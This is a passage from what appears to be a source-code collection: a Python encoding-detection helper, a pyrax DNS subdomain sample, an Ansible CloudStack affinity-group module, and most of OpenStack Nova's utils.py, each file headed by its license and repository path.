re.compile(r"coding[:=]\s*([-\w.]+)") # Do this so the detect_encode code we copied will work. readline = iter(source.splitlines(True)).next def _get_normal_name(orig_enc): """Imitates get_normal_name in tokenizer.c.""" # Only care about the first 12 characters. enc = orig_enc[:12].lower().replace("_", "-") if re.match(r"^utf-8($|-)", enc): return "utf-8" if re.match(r"^(latin-1|iso-8859-1|iso-latin-1)($|-)", enc): return "iso-8859-1" return orig_enc # From detect_encode(): # It detects the encoding from the presence of a utf-8 bom or an encoding # cookie as specified in pep-0263. If both a bom and a cookie are present, # but disagree, a SyntaxError will be raised. If the encoding cookie is an # invalid charset, raise a SyntaxError. Note that if a utf-8 bom is found, # 'utf-8-sig' is returned. # If no encoding is specified, then the default will be returned. The # default varied with version. if sys.version_info <= (2, 4): default = 'iso-8859-1' else: default = 'ascii' bom_found = False encoding = None def read_or_stop(): """Get the next source line, or ''.""" try: return readline() except StopIteration: return '' def find_cookie(line): """Find an encoding cookie in `line`.""" try: line_string = line.decode('ascii') except UnicodeDecodeError: return None matches = cookie_re.findall(line_string) if not matches: return None encoding = _get_normal_name(matches[0]) try: codec = codecs.lookup(encoding) except LookupError: # This behaviour mimics the Python interpreter raise SyntaxError("unknown encoding: " + encoding) if bom_found: # codecs in 2.3 were raw tuples of functions, assume the best. codec_name = getattr(codec, 'name', encoding) if codec_name != 'utf-8': # This behaviour mimics the Python interpreter raise SyntaxError('encoding problem: utf-8') encoding += '-sig' return encoding first = read_or_stop() if first.startswith(codecs.BOM_UTF8): bom_found = True first = first[3:] default = 'utf-8-sig' if not first: return default encoding = find_cookie(first) if encoding: return encoding second = read_or_stop() if not second: return default encoding = find_cookie(second) if encoding: return encoding return default
apache-2.0
pratikmallya/pyrax
samples/cloud_dns/create_subdomain.py
13
1924
#!/usr/bin/env python # -*- coding: utf-8 -*- # Copyright (c)2012 Rackspace US, Inc. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from __future__ import print_function import os import sys import six import pyrax import pyrax.exceptions as exc pyrax.set_setting("identity_type", "rackspace") creds_file = os.path.expanduser("~/.rackspace_cloud_credentials") pyrax.set_credential_file(creds_file) dns = pyrax.cloud_dns domain_name = "abc.example.edu" try: dom = dns.find(name=domain_name) except exc.NotFound as e: answer = six.moves.input("The domain '%s' was not found. Do you want to create " "it? [y/n]" % domain_name) if not answer.lower().startswith("y"): sys.exit() try: dom = dns.create(name=domain_name, emailAddress="sample@example.edu", ttl=900, comment="sample domain") except exc.DomainCreationFailed as e: print("Domain creation failed:", e) print() sys.exit() print("Domain created:", dom) print() sub_name = "sub.%s" % domain_name try: sub = dns.create(name=sub_name, emailAddress="sample@example.edu", ttl=900, comment="sample subdomain") except exc.DomainCreationFailed as e: print("Could not create '%s': %s" % (sub_name, e)) print() sys.exit() print("Subdomain '%s' successfully created." % sub_name) print(sub) print()
apache-2.0
halberom/ansible-modules-extras
cloud/cloudstack/cs_affinitygroup.py
33
7824
#!/usr/bin/python # -*- coding: utf-8 -*- # # (c) 2015, René Moser <mail@renemoser.net> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. DOCUMENTATION = ''' --- module: cs_affinitygroup short_description: Manages affinity groups on Apache CloudStack based clouds. description: - Create and remove affinity groups. version_added: '2.0' author: "René Moser (@resmo)" options: name: description: - Name of the affinity group. required: true affinty_type: description: - Type of the affinity group. If not specified, first found affinity type is used. required: false default: null description: description: - Description of the affinity group. required: false default: null state: description: - State of the affinity group. required: false default: 'present' choices: [ 'present', 'absent' ] domain: description: - Domain the affinity group is related to. required: false default: null account: description: - Account the affinity group is related to. required: false default: null project: description: - Name of the project the affinity group is related to. required: false default: null poll_async: description: - Poll async jobs until job has finished. required: false default: true extends_documentation_fragment: cloudstack ''' EXAMPLES = ''' # Create a affinity group - local_action: module: cs_affinitygroup name: haproxy affinty_type: host anti-affinity # Remove a affinity group - local_action: module: cs_affinitygroup name: haproxy state: absent ''' RETURN = ''' --- id: description: UUID of the affinity group. returned: success type: string sample: 87b1e0ce-4e01-11e4-bb66-0050569e64b8 name: description: Name of affinity group. returned: success type: string sample: app description: description: Description of affinity group. returned: success type: string sample: application affinity group affinity_type: description: Type of affinity group. returned: success type: string sample: host anti-affinity project: description: Name of project the affinity group is related to. returned: success type: string sample: Production domain: description: Domain the affinity group is related to. returned: success type: string sample: example domain account: description: Account the affinity group is related to. returned: success type: string sample: example account ''' try: from cs import CloudStack, CloudStackException, read_config has_lib_cs = True except ImportError: has_lib_cs = False # import cloudstack common from ansible.module_utils.cloudstack import * class AnsibleCloudStackAffinityGroup(AnsibleCloudStack): def __init__(self, module): super(AnsibleCloudStackAffinityGroup, self).__init__(module) self.returns = { 'type': 'affinity_type', } self.affinity_group = None def get_affinity_group(self): if not self.affinity_group: args = {} args['projectid'] = self.get_project(key='id') args['account'] = self.get_account('name') args['domainid'] = self.get_domain('id') args['name'] = self.module.params.get('name') affinity_groups = self.cs.listAffinityGroups(**args) if affinity_groups: self.affinity_group = affinity_groups['affinitygroup'][0] return self.affinity_group def get_affinity_type(self): affinity_type = self.module.params.get('affinty_type') affinity_types = self.cs.listAffinityGroupTypes() if affinity_types: if not affinity_type: return affinity_types['affinityGroupType'][0]['type'] for a in affinity_types['affinityGroupType']: if a['type'] == affinity_type: return a['type'] self.module.fail_json(msg="affinity group type '%s' not found" % affinity_type) def create_affinity_group(self): affinity_group = self.get_affinity_group() if not affinity_group: self.result['changed'] = True args = {} args['name'] = self.module.params.get('name') args['type'] = self.get_affinity_type() args['description'] = self.module.params.get('description') args['projectid'] = self.get_project(key='id') args['account'] = self.get_account('name') args['domainid'] = self.get_domain('id') if not self.module.check_mode: res = self.cs.createAffinityGroup(**args) if 'errortext' in res: self.module.fail_json(msg="Failed: '%s'" % res['errortext']) poll_async = self.module.params.get('poll_async') if res and poll_async: affinity_group = self._poll_job(res, 'affinitygroup') return affinity_group def remove_affinity_group(self): affinity_group = self.get_affinity_group() if affinity_group: self.result['changed'] = True args = {} args['name'] = self.module.params.get('name') args['projectid'] = self.get_project(key='id') args['account'] = self.get_account('name') args['domainid'] = self.get_domain('id') if not self.module.check_mode: res = self.cs.deleteAffinityGroup(**args) if 'errortext' in res: self.module.fail_json(msg="Failed: '%s'" % res['errortext']) poll_async = self.module.params.get('poll_async') if res and poll_async: res = self._poll_job(res, 'affinitygroup') return affinity_group def main(): argument_spec = cs_argument_spec() argument_spec.update(dict( name = dict(required=True), affinty_type = dict(default=None), description = dict(default=None), state = dict(choices=['present', 'absent'], default='present'), domain = dict(default=None), account = dict(default=None), project = dict(default=None), poll_async = dict(type='bool', default=True), )) module = AnsibleModule( argument_spec=argument_spec, required_together=cs_required_together(), supports_check_mode=True ) if not has_lib_cs: module.fail_json(msg="python library cs required: pip install cs") try: acs_ag = AnsibleCloudStackAffinityGroup(module) state = module.params.get('state') if state in ['absent']: affinity_group = acs_ag.remove_affinity_group() else: affinity_group = acs_ag.create_affinity_group() result = acs_ag.get_result(affinity_group) except CloudStackException as e: module.fail_json(msg='CloudStackException: %s' % str(e)) module.exit_json(**result) # import module snippets from ansible.module_utils.basic import * if __name__ == '__main__': main()
gpl-3.0
sacharya/nova
nova/utils.py
1
36217
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # Copyright 2010 United States Government as represented by the # Administrator of the National Aeronautics and Space Administration. # Copyright 2011 Justin Santa Barbara # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Utilities and helper functions.""" import contextlib import datetime import functools import hashlib import inspect import os import pyclbr import random import re import shutil import socket import struct import sys import tempfile from xml.sax import saxutils import eventlet import netaddr from oslo.config import cfg import six from nova import exception from nova.openstack.common import excutils from nova.openstack.common import gettextutils from nova.openstack.common.gettextutils import _ from nova.openstack.common import importutils from nova.openstack.common import lockutils from nova.openstack.common import log as logging from nova.openstack.common import processutils from nova.openstack.common.rpc import common as rpc_common from nova.openstack.common import timeutils notify_decorator = 'nova.notifications.notify_decorator' monkey_patch_opts = [ cfg.BoolOpt('monkey_patch', default=False, help='Whether to log monkey patching'), cfg.ListOpt('monkey_patch_modules', default=[ 'nova.api.ec2.cloud:%s' % (notify_decorator), 'nova.compute.api:%s' % (notify_decorator) ], help='List of modules/decorators to monkey patch'), ] utils_opts = [ cfg.IntOpt('password_length', default=12, help='Length of generated instance admin passwords'), cfg.StrOpt('instance_usage_audit_period', default='month', help='time period to generate instance usages for. ' 'Time period must be hour, day, month or year'), cfg.StrOpt('rootwrap_config', default="/etc/nova/rootwrap.conf", help='Path to the rootwrap configuration file to use for ' 'running commands as root'), cfg.StrOpt('tempdir', help='Explicitly specify the temporary working directory'), ] CONF = cfg.CONF CONF.register_opts(monkey_patch_opts) CONF.register_opts(utils_opts) CONF.import_opt('network_api_class', 'nova.network') LOG = logging.getLogger(__name__) # Used for looking up extensions of text # to their 'multiplied' byte amount BYTE_MULTIPLIERS = { '': 1, 't': 1024 ** 4, 'g': 1024 ** 3, 'm': 1024 ** 2, 'k': 1024, } # used in limits TIME_UNITS = { 'SECOND': 1, 'MINUTE': 60, 'HOUR': 3600, 'DAY': 84400 } _IS_NEUTRON_ATTEMPTED = False _IS_NEUTRON = False synchronized = lockutils.synchronized_with_prefix('nova-') SM_IMAGE_PROP_PREFIX = "image_" SM_INHERITABLE_KEYS = ( 'min_ram', 'min_disk', 'disk_format', 'container_format', ) def vpn_ping(address, port, timeout=0.05, session_id=None): """Sends a vpn negotiation packet and returns the server session. Returns False on a failure. Basic packet structure is below. Client packet (14 bytes):: 0 1 8 9 13 +-+--------+-----+ |x| cli_id |?????| +-+--------+-----+ x = packet identifier 0x38 cli_id = 64 bit identifier ? = unknown, probably flags/padding Server packet (26 bytes):: 0 1 8 9 13 14 21 2225 +-+--------+-----+--------+----+ |x| srv_id |?????| cli_id |????| +-+--------+-----+--------+----+ x = packet identifier 0x40 cli_id = 64 bit identifier ? = unknown, probably flags/padding bit 9 was 1 and the rest were 0 in testing """ if session_id is None: session_id = random.randint(0, 0xffffffffffffffff) sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) data = struct.pack('!BQxxxxx', 0x38, session_id) sock.sendto(data, (address, port)) sock.settimeout(timeout) try: received = sock.recv(2048) except socket.timeout: return False finally: sock.close() fmt = '!BQxxxxxQxxxx' if len(received) != struct.calcsize(fmt): LOG.warn(_('Expected to receive %(exp)s bytes, but actually %(act)s') % dict(exp=struct.calcsize(fmt), act=len(received))) return False (identifier, server_sess, client_sess) = struct.unpack(fmt, received) if identifier == 0x40 and client_sess == session_id: return server_sess def _get_root_helper(): return 'sudo nova-rootwrap %s' % CONF.rootwrap_config def execute(*cmd, **kwargs): """Convenience wrapper around oslo's execute() method.""" if 'run_as_root' in kwargs and not 'root_helper' in kwargs: kwargs['root_helper'] = _get_root_helper() return processutils.execute(*cmd, **kwargs) def trycmd(*args, **kwargs): """Convenience wrapper around oslo's trycmd() method.""" if 'run_as_root' in kwargs and not 'root_helper' in kwargs: kwargs['root_helper'] = _get_root_helper() return processutils.trycmd(*args, **kwargs) def novadir(): import nova return os.path.abspath(nova.__file__).split('nova/__init__.py')[0] def generate_uid(topic, size=8): characters = '01234567890abcdefghijklmnopqrstuvwxyz' choices = [random.choice(characters) for _x in xrange(size)] return '%s-%s' % (topic, ''.join(choices)) # Default symbols to use for passwords. Avoids visually confusing characters. # ~6 bits per symbol DEFAULT_PASSWORD_SYMBOLS = ('23456789', # Removed: 0,1 'ABCDEFGHJKLMNPQRSTUVWXYZ', # Removed: I, O 'abcdefghijkmnopqrstuvwxyz') # Removed: l # ~5 bits per symbol EASIER_PASSWORD_SYMBOLS = ('23456789', # Removed: 0, 1 'ABCDEFGHJKLMNPQRSTUVWXYZ') # Removed: I, O def last_completed_audit_period(unit=None, before=None): """This method gives you the most recently *completed* audit period. arguments: units: string, one of 'hour', 'day', 'month', 'year' Periods normally begin at the beginning (UTC) of the period unit (So a 'day' period begins at midnight UTC, a 'month' unit on the 1st, a 'year' on Jan, 1) unit string may be appended with an optional offset like so: 'day@18' This will begin the period at 18:00 UTC. 'month@15' starts a monthly period on the 15th, and year@3 begins a yearly one on March 1st. before: Give the audit period most recently completed before <timestamp>. Defaults to now. returns: 2 tuple of datetimes (begin, end) The begin timestamp of this audit period is the same as the end of the previous. """ if not unit: unit = CONF.instance_usage_audit_period offset = 0 if '@' in unit: unit, offset = unit.split("@", 1) offset = int(offset) if before is not None: rightnow = before else: rightnow = timeutils.utcnow() if unit not in ('month', 'day', 'year', 'hour'): raise ValueError('Time period must be hour, day, month or year') if unit == 'month': if offset == 0: offset = 1 end = datetime.datetime(day=offset, month=rightnow.month, year=rightnow.year) if end >= rightnow: year = rightnow.year if 1 >= rightnow.month: year -= 1 month = 12 + (rightnow.month - 1) else: month = rightnow.month - 1 end = datetime.datetime(day=offset, month=month, year=year) year = end.year if 1 >= end.month: year -= 1 month = 12 + (end.month - 1) else: month = end.month - 1 begin = datetime.datetime(day=offset, month=month, year=year) elif unit == 'year': if offset == 0: offset = 1 end = datetime.datetime(day=1, month=offset, year=rightnow.year) if end >= rightnow: end = datetime.datetime(day=1, month=offset, year=rightnow.year - 1) begin = datetime.datetime(day=1, month=offset, year=rightnow.year - 2) else: begin = datetime.datetime(day=1, month=offset, year=rightnow.year - 1) elif unit == 'day': end = datetime.datetime(hour=offset, day=rightnow.day, month=rightnow.month, year=rightnow.year) if end >= rightnow: end = end - datetime.timedelta(days=1) begin = end - datetime.timedelta(days=1) elif unit == 'hour': end = rightnow.replace(minute=offset, second=0, microsecond=0) if end >= rightnow: end = end - datetime.timedelta(hours=1) begin = end - datetime.timedelta(hours=1) return (begin, end) def generate_password(length=None, symbolgroups=DEFAULT_PASSWORD_SYMBOLS): """Generate a random password from the supplied symbol groups. At least one symbol from each group will be included. Unpredictable results if length is less than the number of symbol groups. Believed to be reasonably secure (with a reasonable password length!) """ if length is None: length = CONF.password_length r = random.SystemRandom() # NOTE(jerdfelt): Some password policies require at least one character # from each group of symbols, so start off with one random character # from each symbol group password = [r.choice(s) for s in symbolgroups] # If length < len(symbolgroups), the leading characters will only # be from the first length groups. Try our best to not be predictable # by shuffling and then truncating. r.shuffle(password) password = password[:length] length -= len(password) # then fill with random characters from all symbol groups symbols = ''.join(symbolgroups) password.extend([r.choice(symbols) for _i in xrange(length)]) # finally shuffle to ensure first x characters aren't from a # predictable group r.shuffle(password) return ''.join(password) def get_my_ipv4_address(): """Run ip route/addr commands to figure out the best ipv4 """ LOCALHOST = '127.0.0.1' try: out = execute('ip', '-f', 'inet', '-o', 'route', 'show') # Find the default route regex_default = ('default\s*via\s*' '(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' '\s*dev\s*(\w*)\s*') default_routes = re.findall(regex_default, out[0]) if not default_routes: return LOCALHOST gateway, iface = default_routes[0] # Find the right subnet for the gateway/interface for # the default route route = ('(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\/(\d{1,2})' '\s*dev\s*(\w*)\s*') for match in re.finditer(route, out[0]): subnet = netaddr.IPNetwork(match.group(1) + "/" + match.group(2)) if (match.group(3) == iface and netaddr.IPAddress(gateway) in subnet): try: return _get_ipv4_address_for_interface(iface) except exception.NovaException: pass except Exception as ex: LOG.error(_("Couldn't get IPv4 : %(ex)s") % {'ex': ex}) return LOCALHOST def _get_ipv4_address_for_interface(iface): """Run ip addr show for an interface and grab its ipv4 addresses """ try: out = execute('ip', '-f', 'inet', '-o', 'addr', 'show', iface) regexp_address = re.compile('inet\s*' '(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})') address = [m.group(1) for m in regexp_address.finditer(out[0]) if m.group(1) != '127.0.0.1'] if address: return address[0] else: msg = _('IPv4 address is not found.: %s') % out[0] raise exception.NovaException(msg) except Exception as ex: msg = _("Couldn't get IPv4 of %(interface)s" " : %(ex)s") % {'interface': iface, 'ex': ex} LOG.error(msg) raise exception.NovaException(msg) def get_my_linklocal(interface): try: if_str = execute('ip', '-f', 'inet6', '-o', 'addr', 'show', interface) condition = '\s+inet6\s+([0-9a-f:]+)/\d+\s+scope\s+link' links = [re.search(condition, x) for x in if_str[0].split('\n')] address = [w.group(1) for w in links if w is not None] if address[0] is not None: return address[0] else: msg = _('Link Local address is not found.:%s') % if_str raise exception.NovaException(msg) except Exception as ex: msg = _("Couldn't get Link Local IP of %(interface)s" " :%(ex)s") % {'interface': interface, 'ex': ex} raise exception.NovaException(msg) class LazyPluggable(object): """A pluggable backend loaded lazily based on some value.""" def __init__(self, pivot, config_group=None, **backends): self.__backends = backends self.__pivot = pivot self.__backend = None self.__config_group = config_group def __get_backend(self): if not self.__backend: if self.__config_group is None: backend_name = CONF[self.__pivot] else: backend_name = CONF[self.__config_group][self.__pivot] if backend_name not in self.__backends: msg = _('Invalid backend: %s') % backend_name raise exception.NovaException(msg) backend = self.__backends[backend_name] if isinstance(backend, tuple): name = backend[0] fromlist = backend[1] else: name = backend fromlist = backend self.__backend = __import__(name, None, None, fromlist) return self.__backend def __getattr__(self, key): backend = self.__get_backend() return getattr(backend, key) def xhtml_escape(value): """Escapes a string so it is valid within XML or XHTML. """ return saxutils.escape(value, {'"': '&quot;', "'": '&apos;'}) def utf8(value): """Try to turn a string into utf-8 if possible. Code is directly from the utf8 function in http://github.com/facebook/tornado/blob/master/tornado/escape.py """ if isinstance(value, unicode): return value.encode('utf-8') elif isinstance(value, gettextutils.Message): return unicode(value).encode('utf-8') assert isinstance(value, str) return value def check_isinstance(obj, cls): """Checks that obj is of type cls, and lets PyLint infer types.""" if isinstance(obj, cls): return obj raise Exception(_('Expected object of type: %s') % (str(cls))) def parse_server_string(server_str): """ Parses the given server_string and returns a list of host and port. If it's not a combination of host part and port, the port element is a null string. If the input is invalid expression, return a null list. """ try: # First of all, exclude pure IPv6 address (w/o port). if netaddr.valid_ipv6(server_str): return (server_str, '') # Next, check if this is IPv6 address with a port number combination. if server_str.find("]:") != -1: (address, port) = server_str.replace('[', '', 1).split(']:') return (address, port) # Third, check if this is a combination of an address and a port if server_str.find(':') == -1: return (server_str, '') # This must be a combination of an address and a port (address, port) = server_str.split(':') return (address, port) except Exception: LOG.error(_('Invalid server_string: %s'), server_str) return ('', '') def is_int_like(val): """Check if a value looks like an int.""" try: return str(int(val)) == str(val) except Exception: return False def is_valid_ipv4(address): """Verify that address represents a valid IPv4 address.""" try: return netaddr.valid_ipv4(address) except Exception: return False def is_valid_ipv6(address): try: return netaddr.valid_ipv6(address) except Exception: return False def is_valid_ipv6_cidr(address): try: str(netaddr.IPNetwork(address, version=6).cidr) return True except Exception: return False def get_shortened_ipv6(address): addr = netaddr.IPAddress(address, version=6) return str(addr.ipv6()) def get_shortened_ipv6_cidr(address): net = netaddr.IPNetwork(address, version=6) return str(net.cidr) def is_valid_cidr(address): """Check if address is valid The provided address can be a IPv6 or a IPv4 CIDR address. """ try: # Validate the correct CIDR Address netaddr.IPNetwork(address) except netaddr.core.AddrFormatError: return False except UnboundLocalError: # NOTE(MotoKen): work around bug in netaddr 0.7.5 (see detail in # https://github.com/drkjam/netaddr/issues/2) return False # Prior validation partially verify /xx part # Verify it here ip_segment = address.split('/') if (len(ip_segment) <= 1 or ip_segment[1] == ''): return False return True def get_ip_version(network): """Returns the IP version of a network (IPv4 or IPv6). Raises AddrFormatError if invalid network. """ if netaddr.IPNetwork(network).version == 6: return "IPv6" elif netaddr.IPNetwork(network).version == 4: return "IPv4" def monkey_patch(): """If the Flags.monkey_patch set as True, this function patches a decorator for all functions in specified modules. You can set decorators for each modules using CONF.monkey_patch_modules. The format is "Module path:Decorator function". Example: 'nova.api.ec2.cloud:nova.notifications.notify_decorator' Parameters of the decorator is as follows. (See nova.notifications.notify_decorator) name - name of the function function - object of the function """ # If CONF.monkey_patch is not True, this function do nothing. if not CONF.monkey_patch: return # Get list of modules and decorators for module_and_decorator in CONF.monkey_patch_modules: module, decorator_name = module_and_decorator.split(':') # import decorator function decorator = importutils.import_class(decorator_name) __import__(module) # Retrieve module information using pyclbr module_data = pyclbr.readmodule_ex(module) for key in module_data.keys(): # set the decorator for the class methods if isinstance(module_data[key], pyclbr.Class): clz = importutils.import_class("%s.%s" % (module, key)) for method, func in inspect.getmembers(clz, inspect.ismethod): setattr(clz, method, decorator("%s.%s.%s" % (module, key, method), func)) # set the decorator for the function if isinstance(module_data[key], pyclbr.Function): func = importutils.import_class("%s.%s" % (module, key)) setattr(sys.modules[module], key, decorator("%s.%s" % (module, key), func)) def convert_to_list_dict(lst, label): """Convert a value or list into a list of dicts.""" if not lst: return None if not isinstance(lst, list): lst = [lst] return [{label: x} for x in lst] def make_dev_path(dev, partition=None, base='/dev'): """Return a path to a particular device. >>> make_dev_path('xvdc') /dev/xvdc >>> make_dev_path('xvdc', 1) /dev/xvdc1 """ path = os.path.join(base, dev) if partition: path += str(partition) return path def sanitize_hostname(hostname): """Return a hostname which conforms to RFC-952 and RFC-1123 specs.""" if isinstance(hostname, unicode): hostname = hostname.encode('latin-1', 'ignore') hostname = re.sub('[ _]', '-', hostname) hostname = re.sub('[^\w.-]+', '', hostname) hostname = hostname.lower() hostname = hostname.strip('.-') return hostname def read_cached_file(filename, cache_info, reload_func=None): """Read from a file if it has been modified. :param cache_info: dictionary to hold opaque cache. :param reload_func: optional function to be called with data when file is reloaded due to a modification. :returns: data from file """ mtime = os.path.getmtime(filename) if not cache_info or mtime != cache_info.get('mtime'): LOG.debug(_("Reloading cached file %s") % filename) with open(filename) as fap: cache_info['data'] = fap.read() cache_info['mtime'] = mtime if reload_func: reload_func(cache_info['data']) return cache_info['data'] @contextlib.contextmanager def temporary_mutation(obj, **kwargs): """Temporarily set the attr on a particular object to a given value then revert when finished. One use of this is to temporarily set the read_deleted flag on a context object: with temporary_mutation(context, read_deleted="yes"): do_something_that_needed_deleted_objects() """ def is_dict_like(thing): return hasattr(thing, 'has_key') def get(thing, attr, default): if is_dict_like(thing): return thing.get(attr, default) else: return getattr(thing, attr, default) def set_value(thing, attr, val): if is_dict_like(thing): thing[attr] = val else: setattr(thing, attr, val) def delete(thing, attr): if is_dict_like(thing): del thing[attr] else: delattr(thing, attr) NOT_PRESENT = object() old_values = {} for attr, new_value in kwargs.items(): old_values[attr] = get(obj, attr, NOT_PRESENT) set_value(obj, attr, new_value) try: yield finally: for attr, old_value in old_values.items(): if old_value is NOT_PRESENT: delete(obj, attr) else: set_value(obj, attr, old_value) def generate_mac_address(): """Generate an Ethernet MAC address.""" # NOTE(vish): We would prefer to use 0xfe here to ensure that linux # bridge mac addresses don't change, but it appears to # conflict with libvirt, so we use the next highest octet # that has the unicast and locally administered bits set # properly: 0xfa. # Discussion: https://bugs.launchpad.net/nova/+bug/921838 mac = [0xfa, 0x16, 0x3e, random.randint(0x00, 0xff), random.randint(0x00, 0xff), random.randint(0x00, 0xff)] return ':'.join(map(lambda x: "%02x" % x, mac)) def read_file_as_root(file_path): """Secure helper to read file as root.""" try: out, _err = execute('cat', file_path, run_as_root=True) return out except processutils.ProcessExecutionError: raise exception.FileNotFound(file_path=file_path) @contextlib.contextmanager def temporary_chown(path, owner_uid=None): """Temporarily chown a path. :params owner_uid: UID of temporary owner (defaults to current user) """ if owner_uid is None: owner_uid = os.getuid() orig_uid = os.stat(path).st_uid if orig_uid != owner_uid: execute('chown', owner_uid, path, run_as_root=True) try: yield finally: if orig_uid != owner_uid: execute('chown', orig_uid, path, run_as_root=True) @contextlib.contextmanager def tempdir(**kwargs): argdict = kwargs.copy() if 'dir' not in argdict: argdict['dir'] = CONF.tempdir tmpdir = tempfile.mkdtemp(**argdict) try: yield tmpdir finally: try: shutil.rmtree(tmpdir) except OSError as e: LOG.error(_('Could not remove tmpdir: %s'), str(e)) def walk_class_hierarchy(clazz, encountered=None): """Walk class hierarchy, yielding most derived classes first.""" if not encountered: encountered = [] for subclass in clazz.__subclasses__(): if subclass not in encountered: encountered.append(subclass) # drill down to leaves first for subsubclass in walk_class_hierarchy(subclass, encountered): yield subsubclass yield subclass class UndoManager(object): """Provides a mechanism to facilitate rolling back a series of actions when an exception is raised. """ def __init__(self): self.undo_stack = [] def undo_with(self, undo_func): self.undo_stack.append(undo_func) def _rollback(self): for undo_func in reversed(self.undo_stack): undo_func() def rollback_and_reraise(self, msg=None, **kwargs): """Rollback a series of actions then re-raise the exception. .. note:: (sirp) This should only be called within an exception handler. """ with excutils.save_and_reraise_exception(): if msg: LOG.exception(msg, **kwargs) self._rollback() def mkfs(fs, path, label=None, run_as_root=False): """Format a file or block device :param fs: Filesystem type (examples include 'swap', 'ext3', 'ext4' 'btrfs', etc.) :param path: Path to file or block device to format :param label: Volume label to use """ if fs == 'swap': args = ['mkswap'] else: args = ['mkfs', '-t', fs] #add -F to force no interactive execute on non-block device. if fs in ('ext3', 'ext4', 'ntfs'): args.extend(['-F']) if label: if fs in ('msdos', 'vfat'): label_opt = '-n' else: label_opt = '-L' args.extend([label_opt, label]) args.append(path) execute(*args, run_as_root=run_as_root) def last_bytes(file_like_object, num): """Return num bytes from the end of the file, and remaining byte count. :param file_like_object: The file to read :param num: The number of bytes to return :returns (data, remaining) """ try: file_like_object.seek(-num, os.SEEK_END) except IOError as e: if e.errno == 22: file_like_object.seek(0, os.SEEK_SET) else: raise remaining = file_like_object.tell() return (file_like_object.read(), remaining) def metadata_to_dict(metadata): result = {} for item in metadata: if not item.get('deleted'): result[item['key']] = item['value'] return result def dict_to_metadata(metadata): result = [] for key, value in metadata.iteritems(): result.append(dict(key=key, value=value)) return result def instance_meta(instance): if isinstance(instance['metadata'], dict): return instance['metadata'] else: return metadata_to_dict(instance['metadata']) def instance_sys_meta(instance): if not instance.get('system_metadata'): return {} if isinstance(instance['system_metadata'], dict): return instance['system_metadata'] else: return metadata_to_dict(instance['system_metadata']) def get_wrapped_function(function): """Get the method at the bottom of a stack of decorators.""" if not hasattr(function, 'func_closure') or not function.func_closure: return function def _get_wrapped_function(function): if not hasattr(function, 'func_closure') or not function.func_closure: return None for closure in function.func_closure: func = closure.cell_contents deeper_func = _get_wrapped_function(func) if deeper_func: return deeper_func elif hasattr(closure.cell_contents, '__call__'): return closure.cell_contents return _get_wrapped_function(function) class ExceptionHelper(object): """Class to wrap another and translate the ClientExceptions raised by its function calls to the actual ones. """ def __init__(self, target): self._target = target def __getattr__(self, name): func = getattr(self._target, name) @functools.wraps(func) def wrapper(*args, **kwargs): try: return func(*args, **kwargs) except rpc_common.ClientException as e: raise (e._exc_info[1], None, e._exc_info[2]) return wrapper def check_string_length(value, name, min_length=0, max_length=None): """Check the length of specified string :param value: the value of the string :param name: the name of the string :param min_length: the min_length of the string :param max_length: the max_length of the string """ if not isinstance(value, six.string_types): msg = _("%s is not a string or unicode") % name raise exception.InvalidInput(message=msg) if len(value) < min_length: msg = _("%(name)s has a minimum character requirement of " "%(min_length)s.") % {'name': name, 'min_length': min_length} raise exception.InvalidInput(message=msg) if max_length and len(value) > max_length: msg = _("%(name)s has more than %(max_length)s " "characters.") % {'name': name, 'max_length': max_length} raise exception.InvalidInput(message=msg) def validate_integer(value, name, min_value=None, max_value=None): """Make sure that value is a valid integer, potentially within range.""" try: value = int(str(value)) except (ValueError, UnicodeEncodeError): msg = _('%(value_name)s must be an integer') raise exception.InvalidInput(reason=( msg % {'value_name': name})) if min_value is not None: if value < min_value: msg = _('%(value_name)s must be >= %(min_value)d') raise exception.InvalidInput( reason=(msg % {'value_name': name, 'min_value': min_value})) if max_value is not None: if value > max_value: msg = _('%(value_name)s must be <= %(max_value)d') raise exception.InvalidInput( reason=( msg % {'value_name': name, 'max_value': max_value}) ) return value def spawn_n(func, *args, **kwargs): """Passthrough method for eventlet.spawn_n. This utility exists so that it can be stubbed for testing without interfering with the service spawns. """ eventlet.spawn_n(func, *args, **kwargs) def is_none_string(val): """ Check if a string represents a None value. """ if not isinstance(val, six.string_types): return False return val.lower() == 'none' def convert_version_to_int(version): try: if type(version) == str: version = convert_version_to_tuple(version) if type(version) == tuple: return reduce(lambda x, y: (x * 1000) + y, version) except Exception: raise exception.NovaException(message="Hypervisor version invalid.") def convert_version_to_str(version_int): version_numbers = [] factor = 1000 while version_int != 0: version_number = version_int - (version_int // factor * factor) version_numbers.insert(0, str(version_number)) version_int = version_int / factor return reduce(lambda x, y: "%s.%s" % (x, y), version_numbers) def convert_version_to_tuple(version_str): return tuple(int(part) for part in version_str.split('.')) def is_neutron(): global _IS_NEUTRON_ATTEMPTED global _IS_NEUTRON if _IS_NEUTRON_ATTEMPTED: return _IS_NEUTRON try: # compatibility with Folsom/Grizzly configs cls_name = CONF.network_api_class if cls_name == 'nova.network.quantumv2.api.API': cls_name = 'nova.network.neutronv2.api.API' _IS_NEUTRON_ATTEMPTED = True from 